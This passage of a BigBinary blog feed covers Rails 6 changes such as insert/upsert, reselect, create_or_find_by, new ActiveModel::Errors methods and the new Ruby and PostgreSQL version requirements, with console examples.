have already discussed in the 1.1 section above.</p><h2>5. <code>insert</code>, <code>insert!</code> and <code>upsert</code></h2><p>Rails 6 has also introduced three more additional methods namely <code>insert</code>,<code>insert!</code> and <code>upsert</code> for convenience.</p><p>The <code>insert</code> method inserts a single record into the database. If that recordviolates a uniqueness constrain, then the <code>insert</code> method will skip insertingrecord into the database without raising an exception.</p><p>Similarly, the <code>insert!</code> method also inserts a single record into the database,but will raise <code>ActiveRecord::RecordNotUnique</code> exception if that record violatesa uniqueness constraint.</p><p>The <code>upsert</code> method inserts or updates a single record into the database similarto how <code>upsert_all</code> does.</p><p>The methods <code>insert</code>, <code>insert!</code> and <code>upsert</code> are wrappers around <code>insert_all</code>,<code>insert_all!</code> and <code>upsert_all</code> respectively.</p><p>Let's see some examples to understand the usage of these methods.</p><pre><code class="language-ruby">Article.insert({ id: 5, title: 'Elm on Rails', author: 'Amanda', slug: '1m-req-per-second' }, unique_by: :slug)# is same asArticle.insert_all([{ id: 5, title: 'Elm on Rails', author: 'Amanda', slug: '1m-req-per-second' }], unique_by: :slug)</code></pre><pre><code class="language-ruby">Article.insert!({ id: 5, title: 'Elm on Rails', author: 'Amanda', slug: '1m-req-per-second' }, returning: %w[ id title ])# is same asArticle.insert_all!([{ id: 5, title: 'Elm on Rails', author: 'Amanda', slug: '1m-req-per-second' }], returning: %w[ id title ])</code></pre><pre><code class="language-ruby">Article.upsert({ id: 5, title: 'Elm on Rails', author: 'Amanda', slug: '1m-req-per-second' }, unique_by: :slug, returning: %w[ id title ])# is same asArticle.upsert_all([{ id: 5, title: 'Elm on Rails', author: 'Amanda', slug: '1m-req-per-second' }], unique_by: :slug, returning: %w[ id title ])</code></pre><hr><p>To learn more about the bulk insert feature and its implementation, please check<a href="https://github.com/rails/rails/pull/35077">rails/rails#35077</a>,<a href="https://github.com/rails/rails/pull/35546">rails/rails#35546</a> and<a href="https://github.com/rails/rails/pull/35854">rails/rails#35854</a>.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Rails 6 drops support for PostgreSQL version less than 9.3]]></title>
       <author><name>Prathamesh Sonpatki</name></author>
      <link href="https://www.bigbinary.com/blog/rails-6-drops-support-for-postgresql-less-than-9-3"/>
      <updated>2019-04-10T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/rails-6-drops-support-for-postgresql-less-than-9-3</id>
      <content type="html"><![CDATA[<p>Before Rails 6, Rails was supporting PostgreSQL from version 9.1 and above. Butin Rails 6,<a href="https://github.com/rails/rails/pull/34520">support for versions less than 9.3 is dropped</a>.If your PostgreSQL version is less than 9.3 then an<a href="https://travis-ci.org/codetriage/codetriage/jobs/506656780#L1591">error</a> isshown as follows.</p><pre><code class="language-text">Your version of PostgreSQL (90224) is too old. Active Record supports PostgreSQL &gt;= 9.3.</code></pre><p>Travis CI uses<a href="https://docs.travis-ci.com/user/database-setup/#postgresql">PostgreSQL 9.2</a> bydefault in their images. So this error can occur while testing the app on TravisCI with Rails 6. It can be resolved by using an<a href="https://github.com/codetriage/codetriage/blob/rails-6/.travis.yml#L12-L13">add-on for PostgreSQL</a>.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Rails 6 requires Ruby 2.5 or newer]]></title>
       <author><name>Vishal Telangre</name></author>
      <link href="https://www.bigbinary.com/blog/rails-6-requires-ruby-2-5-or-newer"/>
      <updated>2019-04-09T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/rails-6-requires-ruby-2-5-or-newer</id>
      <content type="html"><![CDATA[<p>As per <a href="https://github.com/rails/rails/pull/34754">rails/rails#34754</a>, a Rails 6app requires Ruby version 2.5 or newer.</p><p>Let's discuss what we need to know if we are dealing with Rails 6.</p><h2>Ensuring a valid Ruby version is set while creating a new Rails 6 app</h2><p>While creating a new Rails 6 app, we need to ensure that the current Rubyversion in the shell is set to 2.5 or newer.</p><p>If it is set to an older version then the same version will be used by the<code>rails new</code> command to set the Ruby version in <code>.ruby-version</code> and in <code>Gemfile</code>respectively in the created Rails app.</p><pre><code class="language-plaintext">\$ ruby -vruby 2.3.1p112 (2016-04-26 revision 54768) [x86_64-darwin15]\$ rails new meme-wizardcreatecreate README.mdcreate Rakefilecreate .ruby-versioncreate config.rucreate .gitignorecreate Gemfile[...] omitted the rest of the output\$ cd meme-wizard &amp;&amp; grep -C 2 -Rn -a &quot;2.3.1&quot; ../.ruby-version:1:2.3.1----./Gemfile-2-git_source(:github) { |repo| &quot;https://github.com/#{repo}.git&quot; }./Gemfile-3-./Gemfile:4:ruby '2.3.1'./Gemfile-5-./Gemfile-6-# Bundle edge Rails instead: gem 'rails', github: 'rails/rails'</code></pre><p>An easy fix for this is to install a Ruby version 2.5 or newer and use thatversion prior to running the <code>rails new</code> command.</p><pre><code class="language-plaintext">\$ ruby -vruby 2.3.1p112 (2016-04-26 revision 54768) [x86_64-darwin15]\$ rbenv local 2.6.0\$ ruby -vruby 2.6.0p0 (2018-12-25 revision 66547) [x86_64-darwin18]\$ rails new meme-wizard\$ cd meme-wizard &amp;&amp; grep -C 2 -Rn -a &quot;2.6.0&quot; ../.ruby-version:1:2.6.0----./Gemfile-2-git_source(:github) { |repo| &quot;https://github.com/#{repo}.git&quot; }./Gemfile-3-./Gemfile:4:ruby '2.6.0'./Gemfile-5-./Gemfile-6-# Bundle edge Rails instead: gem 'rails', github: 'rails/rails'</code></pre><h2>Upgrading an older Rails app to Rails 6</h2><p>While upgrading an older Rails app to Rails 6, we need to update the Rubyversion to 2.5 or newer in <code>.ruby-version</code> and <code>Gemfile</code> files respectively.</p><h2>What else do we need to know?</h2><p>Since<a href="https://blog.bigbinary.com/2018/02/06/ruby-2-5-added-hash-slice-method.html">Ruby 2.5 has added <code>Hash#slice</code> method</a>,the extension method with the same name defined by<code>activesupport/lib/active_support/core_ext/hash/slice.rb</code> has been<a href="https://github.com/rails/rails/pull/34754">removed from Rails 6</a>.</p><p>Similarly, Rails 6 has also <a href="https://github.com/rails/rails/pull/32034">removed</a>the extension methods <code>Hash#transform_values</code> and <code>Hash#transform_values!</code> fromActive Support in favor of the native methods with the same names which exist inRuby. These methods were<a href="https://blog.bigbinary.com/2017/06/14/ruby-2-4-added-hash-transform-values-and-its-destructive-version-from-active-support.html">introduced in Ruby 2.4 natively</a>.</p><p>If we try to explicitly require <code>active_support/core_ext/hash/transform_values</code>then it would print a deprecation warning.</p><pre><code class="language-ruby">&gt; &gt; require &quot;active_support/core_ext/hash/transform_values&quot;# DEPRECATION WARNING: Ruby 2.5+ (required by Rails 6) provides Hash#transform_values natively, so requiring active_support/core_ext/hash/transform_values is no longer necessary. Requiring it will raise LoadError in Rails 6.1. (called from irb_binding at (irb):1)=&gt; true</code></pre>]]></content>
    </entry><entry>
       <title><![CDATA[Rails 6 database seed uses inline Active Job adapter]]></title>
       <author><name>Prathamesh Sonpatki</name></author>
      <link href="https://www.bigbinary.com/blog/database-seeding-task-uses-inline-active-job-adapter-in-rails-6"/>
      <updated>2019-04-03T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/database-seeding-task-uses-inline-active-job-adapter-in-rails-6</id>
      <content type="html"><![CDATA[<p>We use the <code>db:seed</code> task to seed the database in Rails apps. Recently an<a href="https://github.com/rails/rails/issues/34939">issue</a> was reported on Rails issuetracker where the <code>db:seed</code> task was not finishing.</p><p>In development environment, Rails uses<a href="https://api.rubyonrails.org/v5.2/classes/ActiveJob/QueueAdapters/AsyncAdapter.html">async adapter</a>as the default Active Job adapter. The Async adapter runs jobs with anin-process thread pool.</p><p>This specific issue was happening because the seed task was trying to attach afile using Active Storage. Active Storage<a href="https://github.com/rails/rails/blob/9e34df00039d63b5672315419e76f06f80ef3dc4/activestorage/app/models/active_storage/attachment.rb#L37">adds a job in the background</a>during the attachment process. This task was not getting executed properly usingthe async adapter and it was causing the seed task to hang without exiting.</p><p>It was found out that by using the<a href="https://api.rubyonrails.org/v5.2/classes/ActiveJob/QueueAdapters/InlineAdapter.html">inline</a>adapter in development environment, this issue goes away. But making a wholesalechange of making the default adapter in development environment as inlineadapter defeats the purpose of having the async adapter as default in the firstplace.</p><p>Instead a change is made to<a href="https://github.com/rails/rails/pull/34953">execute all the code related to seeding using inline adapter</a>.The inline adapter makes sure that all the code will be executed immediately.</p><p>As the inline adapter does not allow queuing up the jobs in future, this canresult into an error if the seeding code somehow triggers such jobs. This<a href="https://github.com/rails/rails/issues/35812#issuecomment-479385857">issue</a> isalready reported on Github.</p><h3>Update</h3><p>Active Job is optional framework and we can skip it completely. Now that seedingdepends on presence of Active Job, it was throwing an error when Active Job wasnot part of the application. Also, executing the jobs inline automatically, whenusers has set the Active Job queue adapter to something of their choice wassurprising for the users. So a<a href="https://github.com/rails/rails/pull/35896">change</a> has been made to load theseeds inline only when Active Job is included in the application and the queueadapter is <code>async</code>. This makes it backward compatible as well it does not changeuser's choice of queue adapter automatically.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Rails 6 adds ActiveRecord::Relation#reselect]]></title>
       <author><name>Abhay Nikam</name></author>
      <link href="https://www.bigbinary.com/blog/rails-6-adds-activerecord-relation-reselect"/>
      <updated>2019-04-02T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/rails-6-adds-activerecord-relation-reselect</id>
      <content type="html"><![CDATA[<p>Rails have<a href="https://apidock.com/rails/ActiveRecord/QueryMethods/rewhere"><code>rewhere</code></a> and<a href="https://apidock.com/rails/ActiveRecord/QueryMethods/reorder"><code>reorder</code></a> methodsto change the previously set conditions attributes to new attributes which aregiven as an argument to method.</p><p>Before Rails 6, if you want to change the previously set <code>select</code> statementattributes to new attributes, it was done as follows.</p><pre><code class="language-ruby">&gt;&gt; Post.select(:title, :body).unscope(:select).select(:views)   SELECT &quot;posts&quot;.&quot;views&quot; FROM &quot;posts&quot; LIMIT ? [&quot;LIMIT&quot;, 1]]</code></pre><p>In Rails 6, <code>ActiveRecord::Relation#reselect</code> method is added.</p><p>The <code>reselect</code> method is similar to <code>rewhere</code> and <code>reorder</code>. <code>reselect</code> is ashort-hand for <code>unscope(:select).select(fields)</code>.</p><p>Here is how <code>reselect</code> method can be used.</p><pre><code class="language-ruby">&gt;&gt; Post.select(:title, :body).reselect(:views)   SELECT &quot;posts&quot;.&quot;views&quot; FROM &quot;posts&quot; LIMIT ? [&quot;LIMIT&quot;, 1]]</code></pre><p>Check out the <a href="https://github.com/rails/rails/pull/33611">pull request</a> for moredetails on this.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Rails 6 adds ActiveModel::Errors#of_kind?]]></title>
       <author><name>Amit Choudhary</name></author>
      <link href="https://www.bigbinary.com/blog/rails-6-adds-activemodel-errors-of_kind-"/>
      <updated>2019-04-01T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/rails-6-adds-activemodel-errors-of_kind-</id>
      <content type="html"><![CDATA[<p>Rails 6 added <a href="https://github.com/rails/rails/pull/34866">of_kind?</a> on<code>ActiveModel::Errors</code>. It returns true if the <code>ActiveModel::Errors</code> object hasprovided a key and message associated with it. The default message is<code>:invalid</code>.</p><p><a href="https://github.com/rails/rails/pull/34866">of_kind?</a> is same as<a href="https://api.rubyonrails.org/classes/ActiveModel/Errors.html#method-i-added-3F">ActiveModel::Errors#added?</a>but, it doesn't take extra options as a parameter.</p><p>Let's checkout how it works.</p><h4>Rails 6.0.0.beta2</h4><pre><code class="language-ruby">&gt;&gt; class User &lt; ApplicationRecord&gt;&gt;   validates :name, presence: true&gt;&gt; end&gt;&gt; user = User.new=&gt; =&gt; #&lt;User id: nil, name: nil, password: nil, created_at: nil, updated_at: nil&gt;&gt;&gt; user.valid?=&gt; false&gt;&gt; user.errors=&gt; #&lt;ActiveModel::Errors:0x00007fc462a1d140 @base=#&lt;User id: nil, name: nil, password: nil, created_at: nil, updated_at: nil&gt;, @messages={:name=&gt;[&quot;can't be blank&quot;]}, @details={:name=&gt;[{:error=&gt;:blank}]}&gt;&gt;&gt; user.errors.of_kind?(:name)=&gt; false&gt;&gt; user.errors.of_kind?(:name, :blank)=&gt; true&gt;&gt; user.errors.of_kind?(:name, &quot;can't be blank&quot;)=&gt; true&gt;&gt; user.errors.of_kind?(:name, &quot;is blank&quot;)=&gt; false</code></pre><p>Here is the relevant <a href="https://github.com/rails/rails/pull/34866">pull request</a>.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Rails 6 shows routes in expanded format]]></title>
       <author><name>Prathamesh Sonpatki</name></author>
      <link href="https://www.bigbinary.com/blog/rails-6-shows-routes-in-expanded-format"/>
      <updated>2019-03-27T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/rails-6-shows-routes-in-expanded-format</id>
      <content type="html"><![CDATA[<p>The output of <code>rails routes</code> is in the table format.</p><pre><code class="language-bash">$ rails routes   Prefix Verb   URI Pattern               Controller#Action    users GET    /users(.:format)          users#index          POST   /users(.:format)          users#create new_user GET    /users/new(.:format)      users#newedit_user GET    /users/:id/edit(.:format) users#edit     user GET    /users/:id(.:format)      users#show          PATCH  /users/:id(.:format)      users#update          PUT    /users/:id(.:format)      users#update          DELETE /users/:id(.:format)      users#destroy</code></pre><p>If we have long route names, they don't fit on the terminal window as the outputlines wrap with each other.</p><p><img src="/blog_images/2019/rails-6-shows-routes-in-expanded-format/overlapping_routes.png" alt="Example of overlapping routes"></p><p>Rails 6 has added a way to display the routes in an<a href="https://github.com/rails/rails/pull/32130">expanded format</a>.</p><p>We can pass <code>--expanded</code> switch to the <code>rails routes</code> command to see this inaction.</p><pre><code class="language-bash">$ rails routes --expanded--[ Route 1 ]--------------------------------------------------------------Prefix            | usersVerb              | GETURI               | /users(.:format)Controller#Action | users#index--[ Route 2 ]--------------------------------------------------------------Prefix            |Verb              | POSTURI               | /users(.:format)Controller#Action | users#create--[ Route 3 ]--------------------------------------------------------------Prefix            | new_userVerb              | GETURI               | /users/new(.:format)Controller#Action | users#new--[ Route 4 ]--------------------------------------------------------------Prefix            | edit_userVerb              | GETURI               | /users/:id/edit(.:format)Controller#Action | users#edit</code></pre><p>This shows the output of the routes command in much more user friendly manner.</p><p>The <code>--expanded</code> switch can be used in conjunction with<a href="https://blog.bigbinary.com/2016/02/16/rails-5-options-for-rake-routes.html">other switches for searching specific routes</a>.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Rails 6 adds ActiveModel::Errors#slice!]]></title>
       <author><name>Amit Choudhary</name></author>
      <link href="https://www.bigbinary.com/blog/rails-6-adds-activemodel-errors-slice"/>
      <updated>2019-03-26T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/rails-6-adds-activemodel-errors-slice</id>
      <content type="html"><![CDATA[<p>Rails 6 added <a href="https://github.com/rails/rails/pull/34489">slice!</a> on<code>ActiveModel::Errors</code>. With this addition, it becomes quite easy to select justa few keys from errors and show or return them. Before Rails 6, we needed toconvert the <code>ActiveModel::Errors</code> object to a hash before slicing the keys.</p><p>Let's checkout how it works.</p><h4>Rails 5.2</h4><pre><code class="language-ruby">&gt;&gt; user = User.new=&gt; #&lt;User id: nil, email: nil, password: nil, created_at: nil, updated_at: nil&gt;&gt;&gt; user.valid?=&gt; false&gt;&gt; user.errors=&gt; #&lt;ActiveModel::Errors:0x00007fc46700df10 @base=#&lt;User id: nil, email: nil, password: nil, created_at: nil, updated_at: nil&gt;, @messages={:email=&gt;[&quot;can't be blank&quot;], :password=&gt;[&quot;can't be blank&quot;]}, @details={:email=&gt;[{:error=&gt;:blank}], :password=&gt;[{:error=&gt;:blank}]}&gt;&gt;&gt; user.errors.slice!=&gt; Traceback (most recent call last):        1: from (irb):16NoMethodError (undefined method 'slice!' for #&lt;ActiveModel::Errors:0x00007fa1f0e46eb8&gt;)Did you mean?  slice_when&gt;&gt; errors = user.errors.to_h&gt;&gt; errors.slice!(:email)=&gt; {:password=&gt;[&quot;can't be blank&quot;]}&gt;&gt; errors=&gt; {:email=&gt;[&quot;can't be blank&quot;]}</code></pre><h4>Rails 6.0.0.beta2</h4><pre><code class="language-ruby">&gt;&gt; user = User.new=&gt; #&lt;User id: nil, email: nil, password: nil, created_at: nil, updated_at: nil&gt;&gt;&gt; user.valid?=&gt; false&gt;&gt; user.errors=&gt; #&lt;ActiveModel::Errors:0x00007fc46700df10 @base=#&lt;User id: nil, email: nil, password: nil, created_at: nil, updated_at: nil&gt;, @messages={:email=&gt;[&quot;can't be blank&quot;], :password=&gt;[&quot;can't be blank&quot;]}, @details={:email=&gt;[{:error=&gt;:blank}], :password=&gt;[{:error=&gt;:blank}]}&gt;&gt;&gt; user.errors.slice!(:email)=&gt; {:password=&gt;[&quot;can't be blank&quot;]}&gt;&gt; user.errors=&gt; #&lt;ActiveModel::Errors:0x00007fc46700df10 @base=#&lt;User id: nil, email: nil, password: nil, created_at: nil, updated_at: nil&gt;, @messages={:email=&gt;[&quot;can't be blank&quot;]}, @details={:email=&gt;[{:error=&gt;:blank}]}&gt;</code></pre><p>Here is the relevant <a href="https://github.com/rails/rails/pull/34489">pull request</a>.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Rails 6 adds create_or_find_by and create_or_find_by!]]></title>
       <author><name>Amit Choudhary</name></author>
      <link href="https://www.bigbinary.com/blog/rails-6-adds-create_or_find_by"/>
      <updated>2019-03-25T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/rails-6-adds-create_or_find_by</id>
      <content type="html"><![CDATA[<p>Rails 6 added <a href="https://github.com/rails/rails/pull/31989">create_or_find_by</a> and<a href="https://github.com/rails/rails/pull/31989">create_or_find_by!</a>. Both of thesemethods rely on unique constraints on the database level. If creation fails, itis because of the unique constraints on one or all of the given columns, and itwill try to find the record using <code>find_by!</code>.</p><p><a href="https://github.com/rails/rails/pull/31989">create_or_find_by</a> is an improvementover<a href="https://api.rubyonrails.org/v5.2/classes/ActiveRecord/Relation.html#method-i-find_or_create_by">find_or_create_by</a>because<a href="https://api.rubyonrails.org/v5.2/classes/ActiveRecord/Relation.html#method-i-find_or_create_by">find_or_create_by</a>first queries for the record, and then inserts it if none is found. This couldlead to a race condition.</p><p>As mentioned by DHH in the pull request,<a href="https://github.com/rails/rails/pull/31989">create_or_find_by</a> has a few constoo:</p><ul><li>The table must have unique constraints on the relevant columns.</li><li>This method relies on exception handling, which is generally slower.</li></ul><p><a href="https://github.com/rails/rails/pull/31989">create_or_find_by!</a> raises anexception when creation fails because of the validations.</p><p>Let's see how both methods work in Rails 6.0.0.beta2.</p><h4>Rails 6.0.0.beta2</h4><pre><code class="language-ruby">&gt; &gt; class CreateUsers &lt; ActiveRecord::Migration[6.0]&gt; &gt; def change&gt; &gt; create_table :users do |t|&gt; &gt; t.string :name, index: { unique: true }&gt; &gt;&gt; &gt;       t.timestamps&gt; &gt;     end&gt; &gt;&gt; &gt; end&gt; &gt; end&gt; &gt; class User &lt; ApplicationRecord&gt; &gt; validates :name, presence: true&gt; &gt; end&gt; &gt; User.create_or_find_by(name: 'Amit')&gt; &gt; BEGIN&gt; &gt; INSERT INTO &quot;users&quot; (&quot;name&quot;, &quot;created_at&quot;, &quot;updated_at&quot;) VALUES ($1, $2, \$3) RETURNING &quot;id&quot; [[&quot;name&quot;, &quot;Amit&quot;], [&quot;created_at&quot;, &quot;2019-03-07 09:33:23.391719&quot;], [&quot;updated_at&quot;, &quot;2019-03-07 09:33:23.391719&quot;]]&gt; &gt; COMMIT=&gt; #&lt;User id: 1, name: &quot;Amit&quot;, created_at: &quot;2019-03-07 09:33:23&quot;, updated_at: &quot;2019-03-07 09:33:23&quot;&gt;&gt; &gt; User.create_or_find_by(name: 'Amit')&gt; &gt; BEGIN&gt; &gt; INSERT INTO &quot;users&quot; (&quot;name&quot;, &quot;created_at&quot;, &quot;updated_at&quot;) VALUES ($1, $2, \$3) RETURNING &quot;id&quot; [[&quot;name&quot;, &quot;Amit&quot;], [&quot;created_at&quot;, &quot;2019-03-07 09:46:37.189068&quot;], [&quot;updated_at&quot;, &quot;2019-03-07 09:46:37.189068&quot;]]&gt; &gt; ROLLBACK=&gt; #&lt;User id: 1, name: &quot;Amit&quot;, created_at: &quot;2019-03-07 09:33:23&quot;, updated_at: &quot;2019-03-07 09:33:23&quot;&gt;&gt; &gt; User.create_or_find_by(name: nil)&gt; &gt; BEGIN&gt; &gt; COMMIT=&gt; #&lt;User id: nil, name: nil, created_at: nil, updated_at: nil&gt;&gt; &gt; User.create_or_find_by!(name: nil)=&gt; Traceback (most recent call last):1: from (irb):2ActiveRecord::RecordInvalid (Validation failed: Name can't be blank)</code></pre><p>Here is the relevant <a href="https://github.com/rails/rails/pull/31989">pull request</a>.</p><p>Also note, <a href="https://github.com/rails/rails/pull/31989">create_or_find_by</a> canlead to primary keys running out, if the type of primary key is <code>int</code>. Thishappens because each time<a href="https://github.com/rails/rails/pull/31989">create_or_find_by</a> hits<code>ActiveRecord::RecordNotUnique</code>, it does not rollback auto-increment of theprimary key. The problem is discussed in this<a href="https://github.com/rails/rails/issues/35543">pull request</a>.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Rails 6 raises ActiveModel::MissingAttributeError]]></title>
       <author><name>Amit Choudhary</name></author>
      <link href="https://www.bigbinary.com/blog/rails-6-raises-activemodel-missingattributeerror-when-update_columns-is-used-with-non-existing-attribute"/>
      <updated>2019-03-20T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/rails-6-raises-activemodel-missingattributeerror-when-update_columns-is-used-with-non-existing-attribute</id>
      <content type="html"><![CDATA[<p>Rails 6 raises <code>ActiveModel::MissingAttributeError</code> when<a href="https://github.com/rails/rails/commit/b63701e272">update_columns</a> is used witha non-existing attribute. Before Rails 6,<a href="https://api.rubyonrails.org/v5.2/classes/ActiveRecord/Persistence.html#method-i-update_columns">update_columns</a>raised an <code>ActiveRecord::StatementInvalid</code> error.</p><h4>Rails 5.2</h4><pre><code class="language-ruby">&gt; &gt; User.first.update_columns(email: 'amit@bigbinary.com')&gt; &gt; SELECT &quot;users&quot;.\* FROM &quot;users&quot; ORDER BY &quot;users&quot;.&quot;id&quot; ASC LIMIT $1  [[&quot;LIMIT&quot;, 1]]UPDATE &quot;users&quot; SET &quot;email&quot; = $1 WHERE &quot;users&quot;.&quot;id&quot; = \$2 [[&quot;email&quot;, &quot;amit@bigbinary.com&quot;], [&quot;id&quot;, 1]]=&gt; Traceback (most recent call last):1: from (irb):8ActiveRecord::StatementInvalid (PG::UndefinedColumn: ERROR: column &quot;email&quot; of relation &quot;users&quot; does not exist)LINE 1: UPDATE &quot;users&quot; SET &quot;email&quot; = $1 WHERE &quot;users&quot;.&quot;id&quot; = $2^: UPDATE &quot;users&quot; SET &quot;email&quot; = $1 WHERE &quot;users&quot;.&quot;id&quot; = $2</code></pre><h4>Rails 6.0.0.beta2</h4><pre><code class="language-ruby">&gt; &gt; User.first.update_columns(email: 'amit@bigbinary.com')&gt; &gt; SELECT &quot;users&quot;.\* FROM &quot;users&quot; ORDER BY &quot;users&quot;.&quot;id&quot; ASC LIMIT ? [[&quot;LIMIT&quot;, 1]]Traceback (most recent call last):1: from (irb):1ActiveModel::MissingAttributeError (can't write unknown attribute `email`)</code></pre><p>Here is the relevant <a href="https://github.com/rails/rails/commit/b63701e272">commit</a>.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Rails 6 ActiveRecord::Base.configurations]]></title>
       <author><name>Amit Choudhary</name></author>
      <link href="https://www.bigbinary.com/blog/rails-6-changed-activerecord-base-configurations-result-to-an-object"/>
      <updated>2019-03-19T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/rails-6-changed-activerecord-base-configurations-result-to-an-object</id>
      <content type="html"><![CDATA[<p>Rails 6 changed the return value of<a href="https://github.com/rails/rails/pull/33637">ActiveRecord::Base.configurations</a>to an object of <code>ActiveRecord::DatabaseConfigurations</code>. Before Rails 6,<a href="https://api.rubyonrails.org/v5.2.2/classes/ActiveRecord/Core.html#method-c-configurations">ActiveRecord::Base.configurations</a>returned a hash with all the database configurations. We can call <code>to_h</code> on theobject of <code>ActiveRecord::DatabaseConfigurations</code> to get a hash.</p><p>A method named <a href="https://github.com/rails/rails/pull/33637">configs_for</a> has alsobeen added on to fetch configurations for a particular environment.</p><h4>Rails 5.2</h4><pre><code class="language-ruby">&gt;&gt; ActiveRecord::Base.configurations=&gt; {&quot;development&quot;=&gt;{&quot;adapter&quot;=&gt;&quot;sqlite3&quot;, &quot;pool&quot;=&gt;5, &quot;timeout&quot;=&gt;5000, &quot;database&quot;=&gt;&quot;db/development.sqlite3&quot;}, &quot;test&quot;=&gt;{&quot;adapter&quot;=&gt;&quot;sqlite3&quot;, &quot;pool&quot;=&gt;5, &quot;timeout&quot;=&gt;5000, &quot;database&quot;=&gt;&quot;db/test.sqlite3&quot;}, &quot;production&quot;=&gt;{&quot;adapter&quot;=&gt;&quot;sqlite3&quot;, &quot;pool&quot;=&gt;5, &quot;timeout&quot;=&gt;5000, &quot;database&quot;=&gt;&quot;db/production.sqlite3&quot;}}</code></pre><h4>Rails 6.0.0.beta2</h4><pre><code class="language-ruby">&gt;&gt; ActiveRecord::Base.configurations=&gt; #&lt;ActiveRecord::DatabaseConfigurations:0x00007fc18274f9f0 @configurations=[#&lt;ActiveRecord::DatabaseConfigurations::HashConfig:0x00007fc18274f680 @env_name=&quot;development&quot;, @spec_name=&quot;primary&quot;, @config={&quot;adapter&quot;=&gt;&quot;sqlite3&quot;, &quot;pool&quot;=&gt;5, &quot;timeout&quot;=&gt;5000, &quot;database&quot;=&gt;&quot;db/development.sqlite3&quot;}&gt;, #&lt;ActiveRecord::DatabaseConfigurations::HashConfig:0x00007fc18274f608 @env_name=&quot;test&quot;, @spec_name=&quot;primary&quot;, @config={&quot;adapter&quot;=&gt;&quot;sqlite3&quot;, &quot;pool&quot;=&gt;5, &quot;timeout&quot;=&gt;5000, &quot;database&quot;=&gt;&quot;db/test.sqlite3&quot;}&gt;, #&lt;ActiveRecord::DatabaseConfigurations::HashConfig:0x00007fc18274f590 @env_name=&quot;production&quot;, @spec_name=&quot;primary&quot;, @config={&quot;adapter&quot;=&gt;&quot;sqlite3&quot;, &quot;pool&quot;=&gt;5, &quot;timeout&quot;=&gt;5000, &quot;database&quot;=&gt;&quot;db/production.sqlite3&quot;}&gt;]&gt;&gt;&gt; ActiveRecord::Base.configurations.to_h=&gt; {&quot;development&quot;=&gt;{&quot;adapter&quot;=&gt;&quot;sqlite3&quot;, &quot;pool&quot;=&gt;5, &quot;timeout&quot;=&gt;5000, &quot;database&quot;=&gt;&quot;db/development.sqlite3&quot;}, &quot;test&quot;=&gt;{&quot;adapter&quot;=&gt;&quot;sqlite3&quot;, &quot;pool&quot;=&gt;5, &quot;timeout&quot;=&gt;5000, &quot;database&quot;=&gt;&quot;db/test.sqlite3&quot;}, &quot;production&quot;=&gt;{&quot;adapter&quot;=&gt;&quot;sqlite3&quot;, &quot;pool&quot;=&gt;5, &quot;timeout&quot;=&gt;5000, &quot;database&quot;=&gt;&quot;db/production.sqlite3&quot;}}&gt;&gt; ActiveRecord::Base.configurations['development']=&gt; {&quot;adapter&quot;=&gt;&quot;sqlite3&quot;, &quot;pool&quot;=&gt;5, &quot;timeout&quot;=&gt;5000, &quot;database&quot;=&gt;&quot;db/development.sqlite3&quot;}&gt;&gt; ActiveRecord::Base.configurations.configs_for(env_name: &quot;development&quot;)=&gt; [#&lt;ActiveRecord::DatabaseConfigurations::HashConfig:0x00007fc18274f680 @env_name=&quot;development&quot;, @spec_name=&quot;primary&quot;, @config={&quot;adapter&quot;=&gt;&quot;sqlite3&quot;, &quot;pool&quot;=&gt;5, &quot;timeout&quot;=&gt;5000, &quot;database&quot;=&gt;&quot;db/development.sqlite3&quot;}&gt;]</code></pre><p>Here is the relevant <a href="https://github.com/rails/rails/pull/33637">pull request</a>.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Rails 6 shows unpermitted params in logs in color]]></title>
       <author><name>Prathamesh Sonpatki</name></author>
      <link href="https://www.bigbinary.com/blog/rails-6-shows-unpermitted-params-in-logs-in-color"/>
      <updated>2019-03-18T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/rails-6-shows-unpermitted-params-in-logs-in-color</id>
      <content type="html"><![CDATA[<p>Strong parameters allow us to control the user input in our Rails app. Indevelopment environment the unpermitted parameters are shown in the log asfollows.</p><p><img src="/blog_images/2019/rails-6-shows-unpermitted-params-in-logs-in-color/before.png" alt="Unpermitted params before Rails 6"></p><p>It is easy to miss this message in the flurry of other messages.</p><p>Rails 6 has added a change to<a href="https://github.com/rails/rails/pull/34617">show these params in red color</a> forbetter visibility.</p><p><img src="/blog_images/2019/rails-6-shows-unpermitted-params-in-logs-in-color/after.png" alt="Unpermitted params after Rails 6"></p>]]></content>
    </entry><entry>
       <title><![CDATA[Marketing strategy at BigBinary]]></title>
       <author><name>Neeraj Singh</name></author>
      <link href="https://www.bigbinary.com/blog/marketing-strategy-at-bigbinary"/>
      <updated>2019-03-18T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/marketing-strategy-at-bigbinary</id>
